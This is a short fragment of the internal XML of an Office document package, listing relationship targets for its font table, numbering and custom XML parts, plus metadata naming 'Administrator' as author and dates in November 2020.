<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml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Office_10.1.0.7698_F1E327BC-269C-435d-A152-05C5408002CA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2020-11-10T05:28:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-25T06:06:02Z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2052-10.1.0.7698</vt:lpwstr>
  </property>
</Properties>
</file>